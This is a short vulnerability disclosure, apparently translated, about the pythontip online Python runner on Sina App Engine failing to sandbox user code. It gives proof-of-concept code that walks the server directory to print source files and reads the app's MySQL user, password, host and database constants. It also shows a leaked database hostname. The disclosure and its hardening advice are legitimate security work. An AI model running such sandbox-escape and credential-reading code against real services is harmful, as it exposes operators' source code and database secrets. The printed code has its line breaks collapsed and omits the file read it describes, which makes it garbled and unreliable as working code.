Sina saepythontip execution without using the sandbox mechanism causes code Leakage

In the online execution of pythontip, you can obtain the program source code and program configuration. pythontip online programming does not shield many functions in the OS module, nor prevent open from reading file content, leading to source code leakage; pythontip online programming does not use an isolated python program. As a result, you can use the sae module to read program configurations. Vulnerability proof: Run at http://pythontip.sinaapp.com/coding/run:

import osdef get_filepaths(directory):    file_paths = []  # List which will store all of the full filepaths.    # Walk the tree.    for root, directories, files in os.walk(directory):        for filename in files:            # Join the two strings in order to form the full filepath.            filepath = os.path.join(root, filename)            file_paths.append(filepath)  # Add it to the list.    return file_paths  # Self-explanatory.for p in get_filepaths("."):    if p[-2:] == "py":        f = open(p)        print "=========[" + p + "]========="        f.close()        del f

 

Output all the python script content in the current directory. Part of the screenshot is as follows:

=========[./manage.py]=========#!/usr/bin/env pythonimport osimport sysif __name__ == "__main__":    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pythontip.settings")    from django.core.management import execute_from_command_line

 

(Omitted later) run again

import saeprint sae.const.MYSQL_USERprint sae.const.MYSQL_PASSprint sae.const.MYSQL_HOSTprint sae.const.MYSQL_DBprint sae.const.MYSQL_PORT

 

Output: (apparently the connection information. Although sae prevents external connections to the database, it may be able to read the database through online programming)

y0k0xwjnljwlw2jmzklz5i122j12i2zj3i34j33z2x3mhii4wyw.rdc.sae.sina.com.cnapp_yunmei3307

 

Solution:Pythontip has actually prevented some function execution (for example, execlp iN OS is not available, and fork is not). We recommend that you enhance the protection and use virtualization technology to run python programs.